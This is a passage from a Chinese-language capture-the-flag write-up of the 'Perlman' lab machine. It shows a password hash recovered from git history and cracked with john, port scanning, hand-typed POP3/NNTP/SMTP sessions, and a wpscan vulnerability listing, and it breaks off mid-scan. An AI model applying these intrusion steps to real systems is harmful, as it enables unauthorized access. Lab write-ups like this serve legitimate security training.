perlman\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git diff 40f3ff 0cf1c4\ndiff --git a\/db\/index.php b\/db\/index.php\ndeleted file mode 100644\nindex 11c0725..0000000\n--- a\/db\/index.php\n+++ \/dev\/null\n@@ -1,12 +0,0 @@\n-<?php\n-\n- error_reporting(0);\n- $allow = ['perlman', 'perlman.htb'];\n- if(!isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $allow)) {\n- die('Access allowed only for perlman.htb staff.');\n- } else {\n- header('location: old_backup_2009');\n-\n- }\n-\n-?>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git diff 40f3ff d29e54\ndiff --git a\/db\/index.php b\/db\/index.php\ndeleted file mode 100644\nindex 11c0725..0000000\n--- a\/db\/index.php\n+++ \/dev\/null\n@@ -1,12 +0,0 @@\n-<?php\n-\n- error_reporting(0);\n- $allow = ['perlman', 'perlman.htb'];\n- if(!isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $allow)) {\n- die('Access allowed only for perlman.htb staff.');\n- } else {\n- header('location: old_backup_2009');\n-\n- }\n-\n-?>\ndiff --git a\/users.sql b\/users.sql\nindex 7fe7dd3..572f66c 100644\n--- a\/users.sql\n+++ b\/users.sql\n@@ -46,7 +46,7 @@ CREATE TABLE `users` (\n\n LOCK TABLES `users` WRITE;\n \/*!40000 ALTER TABLE `users` DISABLE KEYS *\/;\n-INSERT INTO `users` VALUES (1,'webmaster','','webmaster','webmaster@perlman.hmv','http:\/\/perlman.hmv','2022-07-03 16:23:02','',0,'webmaster');\n+INSERT INTO `users` VALUES (1,'webmaster','$P$BCaMhRZQp\/mi0nyIVVPS6u1EU8sTCR\/','webmaster','webmaster@perlman.hmv','http:\/\/perlman.hmv','2022-07-03 16:23:02','',0,'webmaster');\n \/*!40000 ALTER TABLE `users` ENABLE KEYS *\/;\n UNLOCK TABLES;\n \/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;<\/code><\/pre>\n\u627e\u5230\u4e86 hash\uff0c\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ echo '$P$BCaMhRZQp\/mi0nyIVVPS6u1EU8sTCR\/' > hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ john hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 128\/128 SSE2 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress 'q' or Ctrl-C to abort, almost any other key for status\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nProceeding with wordlist:\/usr\/share\/john\/password.lst\ncookie (?) \n1g 0:00:00:00 DONE 2\/3 (2024-07-10 22:11) 3.571g\/s 1371p\/s 1371c\/s 1371C\/s purple..larry\nUse the "--show --format=phpass" options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u6dfb\u52a0\u4e00\u4e0b\u57df\u540d\u89e3\u6790\u4ee5\u53ca\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n
192.168.0.176 perlman.hmv<\/code><\/pre>\n\u518d\u6b21\u626b\u63cf\u4e00\u4e0b\u8bd5\u8bd5\uff0c\u53d1\u73b0\u8fd8\u662f\u4e00\u65e0\u6240\u83b7\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ gobuster dir -u http:\/\/perlman.hmv -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html \n\/.php (Status: 403) [Size: 276]\n\/index.html (Status: 200) [Size: 47426]\n\/.html (Status: 403) [Size: 276]\n\/images (Status: 301) [Size: 311] [--> http:\/\/perlman.hmv\/images\/]\n\/css (Status: 301) [Size: 308] [--> http:\/\/perlman.hmv\/css\/]\n\/privacy-policy.html (Status: 200) [Size: 25624]\n\/js (Status: 301) [Size: 307] [--> http:\/\/perlman.hmv\/js\/]\n\/terms-conditions.html (Status: 200) [Size: 18494]\n\/.php (Status: 403) [Size: 276]\n\/.html (Status: 403) [Size: 276]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\n\u654f\u611f\u7aef\u53e3\u63a2\u6d4b<\/h3>\n
\u770b\u4e00\u4e0b\u5176\u4ed6\u7aef\u53e3\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nmap 192.168.0.176 | grep open\n22\/tcp open ssh\n25\/tcp open smtp\n80\/tcp open http\n110\/tcp open pop3\n119\/tcp open nntp\n995\/tcp open pop3s<\/code><\/pre>\n\u5148\u5c1d\u8bd5 ssh\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ ssh webmaster@$IP \nThe authenticity of host '192.168.0.176 (192.168.0.176)' can't be established.\nED25519 key fingerprint is SHA256:mj3kS8pBIwV9crKMRcQXj7whxG9JknAzXwJQeohBVPg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.176' (ED25519) to the list of known hosts.\nwebmaster@192.168.0.176: Permission denied (publickey).<\/code><\/pre>\n25 \u7aef\u53e3\u5f00\u653e\u7684\u662f\u90ae\u4ef6\u7cfb\u7edf\uff0c\u6682\u65f6\u5148\u4e0d\u770b\uff0c\u770b\u4e00\u4e0b 110 \u7aef\u53e3\uff1ahttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 110 \n(UNKNOWN) [192.168.0.176] 110 (pop3) open\n+OK Dovecot (Debian) ready.\nUSER webmaster\n+OK\nPASS cookie\n-ERR [AUTH] Authentication failed.\nSTAT\n-ERR Unknown command.\n^C<\/code><\/pre>\n\u5bc6\u7801\u4e0d\u6b63\u786e\uff0c\u518d\u770b\u770b\u522b\u7684\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 995\n(UNKNOWN) [192.168.0.176] 995 (pop3s) open\nUSER webmaster<\/code><\/pre>\n\u76f4\u63a5\u5f39\u51fa\u6765\u4e86\uff0c\u6700\u540e\u770b\u4e00\u4e0b119<\/code>\u7aef\u53e3\uff1a<\/p>\n\n\u7f51\u7edc\u65b0\u95fb\u4f20\u8f93\u534f\u8bae<\/strong>( NNTP )<\/strong>\u662f\u4e00\u79cd\u5e94\u7528\u534f\u8bae)\uff0c\u7528\u4e8e\u5728\u65b0\u95fb\u670d\u52a1\u5668\u4e4b\u95f4\u4f20\u8f93Usenet\u65b0\u95fb\u6587\u7ae0 ( netnews<\/em> ) \uff0c\u4ee5\u53ca\u4f9b\u6700\u7ec8\u7528\u6237\u5ba2\u6237\u7aef\u5e94\u7528\u7a0b\u5e8f\u9605\u8bfb\/\u53d1\u5e03\u6587\u7ae0\u3002<\/p>\n<\/blockquote>\n<\/div><\/p>\n\u53ef\u4ee5\u53c2\u8003\uff1a<\/p>\n
https:\/\/0xffsec.com\/handbook\/services\/nntp\/<\/a><\/p>\nhttps:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/119_nntp\/<\/a><\/p>\n\u8054\u60f3\u5230\uff1awebmaster@perlman.hmv<\/code><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 119\n(UNKNOWN) [192.168.0.176] 119 (nntp) open\n200 server.example.net InterNetNews NNRP server INN 2.6.4 ready (posting ok)\nLIST\n215 Newsgroups in form "group high low status"\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000003 y\n.\nHELP\n100 Legal commands\n ARTICLE [message-ID|number]\n AUTHINFO USER name|PASS password|SASL mechanism [initial-response]|GENERIC program [argument ...]\n BODY [message-ID|number]\n CAPABILITIES [keyword]\n COMPRESS DEFLATE\n DATE\n GROUP newsgroup\n HDR header [message-ID|range]\n HEAD [message-ID|number]\n HELP\n IHAVE message-ID\n LAST\n LIST [ACTIVE [wildmat]|ACTIVE.TIMES [wildmat]|COUNTS [wildmat]|DISTRIB.PATS|DISTRIBUTIONS|HEADERS [MSGID|RANGE]|MODERATORS|MOTD|NEWSGROUPS [wildmat]|OVERVIEW.FMT|SUBSCRIPTIONS [wildmat]]\n LISTGROUP [newsgroup [range]]\n MODE READER\n NEWGROUPS [yy]yymmdd hhmmss [GMT]\n NEWNEWS wildmat [yy]yymmdd hhmmss [GMT]\n NEXT\n OVER [range]\n POST\n QUIT\n STARTTLS\n STAT [message-ID|number]\n XGTITLE [wildmat]\n XHDR header [message-ID|range]\n XOVER [range]\n XPAT header message-ID|range pattern [pattern ...]\nReport problems to <usenet@perlman.hmv>.\n.\nGROUP\n501 Syntax is: GROUP newsgroup\nCAPABILITIES\n101 Capability list:\nVERSION 2\nIMPLEMENTATION INN 2.6.4\nAUTHINFO SASL\nCOMPRESS DEFLATE\nHDR\nLIST ACTIVE ACTIVE.TIMES COUNTS DISTRIB.PATS DISTRIBUTIONS HEADERS MODERATORS MOTD NEWSGROUPS OVERVIEW.FMT SUBSCRIPTIONS\nOVER\nPOST\nREADER\nSASL DIGEST-MD5 CRAM-MD5 NTLM\nSTARTTLS\nXPAT\n.\nSELECT perlman.hmv \n500 What?\nLIST\n215 Newsgroups in form "group high low status"\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000003 y\n.\nSELECT junk\n500 What?\nGROUP perlman.hmv\n211 0 3 2 perlman.hmv<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6709\u6587\u7ae0\uff0c\u67e5\u770b\u4e00\u4e0b\u6587\u6863\uff1ahttps:\/\/www.ietf.org\/rfc\/rfc977.txt<\/a><\/p>\n<\/div><\/p>\nPOST\n340 Ok, recommended message-ID <v6ni8h$1bb$1@perlman.hmv><\/code><\/pre>\n\u5f97\u5230\u4fe1\u606f\uff01\u4f46\u662f\u67e5\u770bwp\uff0c\u53d1\u73b0\u9700\u8981\u5f97\u5230\u7684\u662f\u53e6\u4e00\u4e2a\u4fe1\u606f\uff0c\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff1a<\/p>\n
\n\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u56e0\u4e3a\u91cd\u65b0\u5bfc\u5165\u7684\u65f6\u5019\u9009\u62e9\u4e86\u4e3a\u6240\u6709\u7f51\u5361\u91cd\u65b0\u751f\u6210MAC\u5730\u5740\u3002<\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 119\n(UNKNOWN) [192.168.0.136] 119 (nntp) open\n200 server.example.net InterNetNews NNRP server INN 2.6.4 ready (posting ok)\nHELP\n100 Legal commands\n ARTICLE [message-ID|number]\n AUTHINFO USER name|PASS password|SASL mechanism [initial-response]|GENERIC program [argument ...]\n BODY [message-ID|number]\n CAPABILITIES [keyword]\n COMPRESS DEFLATE\n DATE\n GROUP newsgroup\n HDR header [message-ID|range]\n HEAD [message-ID|number]\n HELP\n IHAVE message-ID\n LAST\n LIST [ACTIVE [wildmat]|ACTIVE.TIMES [wildmat]|COUNTS [wildmat]|DISTRIB.PATS|DISTRIBUTIONS|HEADERS [MSGID|RANGE]|MODERATORS|MOTD|NEWSGROUPS [wildmat]|OVERVIEW.FMT|SUBSCRIPTIONS [wildmat]]\n LISTGROUP [newsgroup [range]]\n MODE READER\n NEWGROUPS [yy]yymmdd hhmmss [GMT]\n NEWNEWS wildmat [yy]yymmdd hhmmss [GMT]\n NEXT\n OVER [range]\n POST\n QUIT\n STARTTLS\n STAT [message-ID|number]\n XGTITLE [wildmat]\n XHDR header [message-ID|range]\n XOVER [range]\n XPAT header message-ID|range pattern [pattern ...]\nReport problems to <usenet@perlman.hmv>.\n.\nLIST\n215 Newsgroups in form "group high low status"\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000001 y\n.\nGROUP perlman.hmv\n211 1 1 2 perlman.hmv\nARTICLE 2\n220 2 <tfi784$403$1@perlman.hmv> article\nPath: server.example.net!.POSTED.192.168.0.27!not-for-mail\nFrom: rita <rita@perlman.hmv>\nNewsgroups: perlman.hmv\nSubject: Whats up ?!\nDate: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)\nOrganization: A poorly-installed InterNetNews site\nMessage-ID: <tfi784$403$1@perlman.hmv>\nMime-Version: 1.0\nContent-Type: text\/plain; charset=UTF-8\nContent-Transfer-Encoding: 8bit\nInjection-Date: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)\nInjection-Info: perlman.hmv; posting-host="192.168.0.27";\n logging-data="4099"; mail-complaints-to="usenet@perlman.hmv"\nUser-Agent: Pan\/0.151 (Butcha; a6f6327)\nXref: server.example.net perlman.hmv:2\n\nSo cool to have installed a newsgroup server! \nSee you soon kissss\n.<\/code><\/pre>\n\u5f97\u5230\u7528\u6237\u540d rita<\/code>\uff0c\u4ee5\u53ca\u90ae\u7bb1 rita@perlman.hmv<\/code>\u3002<\/p>\n\u91cd\u65b0\u8bbf\u95ee\u524d\u9762\u7684\u5176\u4ed6\u7aef\u53e3\uff1a<\/p>\n
https:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/25_smtp\/<\/a><\/p>\nhttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-smtp#banner-grabbing-basic-connection<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 25\n(UNKNOWN) [192.168.0.136] 25 (smtp) open\n220 perlman.hmv ESMTP Postfix (Debian\/GNU)\nHELO perlman.hmv\n250 perlman.hmv\nVRFY rita\n252 2.0.0 rita\nMAIL FROM:rita@perlman.hmv\n250 2.1.0 Ok\nRCPT TO:hack@hack.com\n250 2.1.5 Ok\nDATA\n354 End data with <CR><LF>.<CR><LF>\n.\n250 2.0.0 Ok: queued as D6E85415F8\nquit\n221 2.0.0 Bye<\/code><\/pre>\n\u7136\u540e\u770b\u4e00\u4e0b\u90a3\u4e2a\u63a5\u90ae\u7bb1\u7684\u7aef\u53e3\uff1ahttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop#banner-grabbing<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 110\n(UNKNOWN) [192.168.0.136] 110 (pop3) open\n+OK Dovecot (Debian) ready.\nUSER rita\n+OK\nPASS cookie\n+OK Logged in.\nLIST\n+OK 1 messages:\n1 2390\n.\nRETR 1\n+OK 2390 octets\nReturn-Path: <>\nX-Original-To: rita@perlman.hmv\nDelivered-To: rita@perlman.hmv\nReceived: by perlman.hmv (Postfix)\n id 9C18441616; Thu, 11 Jul 2024 08:55:41 +0200 (CEST)\nDate: Thu, 11 Jul 2024 08:55:41 +0200 (CEST)\nFrom: MAILER-DAEMON@perlman.hmv (Mail Delivery System)\nSubject: Undelivered Mail Returned to Sender\nTo: rita@perlman.hmv\nAuto-Submitted: auto-replied\nMIME-Version: 1.0\nContent-Type: multipart\/report; report-type=delivery-status;\n boundary="D6E85415F8.1720680941\/perlman.hmv"\nContent-Transfer-Encoding: 8bit\nMessage-Id: <20240711065541.9C18441616@perlman.hmv>\n\nThis is a MIME-encapsulated message.\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Notification\nContent-Type: text\/plain; charset=utf-8\nContent-Transfer-Encoding: 8bit\n\n Charset: us-ascii\n From: MAILER-DAEMON (mailer@itzhak.perlman.hmv)\n Subject: Undelivered Mail Returned to Sender\n Postmaster-Subject: Postmaster Copy: Undelivered Mail\n\n This is the mail system at host perlman.hmv.\n\n I'm sorry to have to inform you that your message could not\n be delivered to one or more recipients. It's attached below.\n\n For further assistance, please send mail to postmaster.\n\n If you do so, please include this problem report. You can\n delete your own text from the attached returned message.\n\n The mail system\n EOF\n\n<hack@hack.com>: mail for hack.com loops back to myself\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Delivery report\nContent-Type: message\/delivery-status\n\nReporting-MTA: dns; perlman.hmv\nX-Postfix-Queue-ID: D6E85415F8\nX-Postfix-Sender: rfc822; rita@perlman.hmv\nArrival-Date: Thu, 11 Jul 2024 08:55:01 +0200 (CEST)\n\nFinal-Recipient: rfc822; hack@hack.com\nOriginal-Recipient: rfc822;hack@hack.com\nAction: failed\nStatus: 5.4.6\nDiagnostic-Code: X-Postfix; mail for hack.com loops back to myself\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Undelivered Message\nContent-Type: message\/rfc822\nContent-Transfer-Encoding: 8bit\n\nReturn-Path: <rita@perlman.hmv>\nReceived: from perlman.hmv (kali [192.168.0.143])\n by perlman.hmv (Postfix) with SMTP id D6E85415F8\n for <hack@hack.com>; Thu, 11 Jul 2024 08:55:01 +0200 (CEST)\n\n--D6E85415F8.1720680941\/perlman.hmv--\n.<\/code><\/pre>\nwordpress\u6d4b\u8bd5<\/h3>\n
\u627e\u5230\u4e00\u4e2a\u57df\u540d\uff1aitzhak.perlman.hmv<\/code><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ whatweb http:\/\/itzhak.perlman.hmv\nhttp:\/\/itzhak.perlman.hmv [200 OK] Apache[2.4.54], Bootstrap[6.0.2], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.54 (Debian)], IP[192.168.0.136], JQuery[3.6.0], MetaGenerator[WordPress 6.0.2], PoweredBy[--], Script, Title[Computer store ! – Just another WordPress site], UncommonHeaders[link], WordPress[6.0.2]<\/code><\/pre>\n\u53d1\u73b0\u662f\u4e00\u4e2awordpress<\/code>\u7ad9\u70b9\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ wpscan --url http:\/\/itzhak.perlman.hmv --api-token XXXXX\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.25\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/itzhak.perlman.hmv\/ [192.168.0.136]\n[+] Started: Thu Jul 11 03:58:38 2024\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.54 (Debian)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/itzhak.perlman.hmv\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/itzhak.perlman.hmv\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/itzhak.perlman.hmv\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/itzhak.perlman.hmv\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 6.0.2 identified (Insecure, released on 2022-08-30).\n | Found By: Rss Generator (Passive Detection)\n | - http:\/\/itzhak.perlman.hmv\/?feed=rss2, <generator>https:\/\/wordpress.org\/?v=6.0.2<\/generator>\n | - http:\/\/itzhak.perlman.hmv\/?feed=comments-rss2, <generator>https:\/\/wordpress.org\/?v=6.0.2<\/generator>\n |\n | [!] 30 vulnerabilities identified:\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/713bdc8b-ab7c-46d7-9847-305344a579c4\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/abf236fdaf94455e7bc6e30980cf70401003e283\n |\n | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/926cd097-b36f-4d26-9c51-0dfab11c301b\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/506eee125953deb658307bb3005417cb83f32095\n |\n | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/c5675b59-4b1d-4f64-9876-068e05145431\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44\n |\n | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/cfd8b50d-16aa-4319-9c2d-b227365c2156\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/8836d4682264e8030067e07f2f953a0f66cb76cc\n |\n | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/b60a6557-ae78-465c-95bc-a78cf74a6dd0\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/a4f9ca17fae0b7d97ff807a3c234cf219810fae0\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/2787684c-aaef-4171-95b4-ee5048c74218\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/02d76d8e-9558-41a5-bdb6-3957dc31563b\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/89c8f7919460c31c0f259453b4ffb63fde9fa955\n |\n | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/3f707e05-25f0-4566-88ed-d8d0aff3a872\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/3765886b4903b319764490d4ad5905bc5c310ef8\n |\n | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/1da03338-557f-4cb6-9a65-3379df4cce47\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/d815d2e8b2a7c2be6694b49276ba3eee5166c21f\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/58d131f5-f376-4679-b604-2b888de71c5b\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/929cf3cb9580636f1ae3fe944b8faf8cca420492\n |\n | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms\/Tags Endpoint\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/b27a8711-a0c0-4996-bd6a-01734702913e\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/ebaac57a9ac0174485c65de3d32ea56de2330d8e\n |\n | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/gutenberg\/pull\/45045\/files\n |\n | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/c8814e6e-78b3-4f63-a1d3-6906a84c1f11\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-3590\n | - https:\/\/blog.sonarsource.com\/wordpress-core-unauthenticated-blind-ssrf\/\n |\n | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/2999613a-b8c8-4ec0-9164-5dfe63adf6e6\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-2745\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/a03d744a-9839-4167-a356-3e7da0f1d532\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/3b574451-2852-4789-bc19-d5cc39948db5\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data\n | Fixed in: 6.0.5\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/ef289d46-ea83-4fa5-b003-0352c690fd89\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-2-security-release\/\n |\n | [!] Title: WP < 6.2.1 - Contributor+ Content Injection\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/1527ebdb-18bc-4f9d-9c20-8d729a628670\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/cd130bb3-8d04-4375-a89a-883af131ed3a\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-38000\n | - 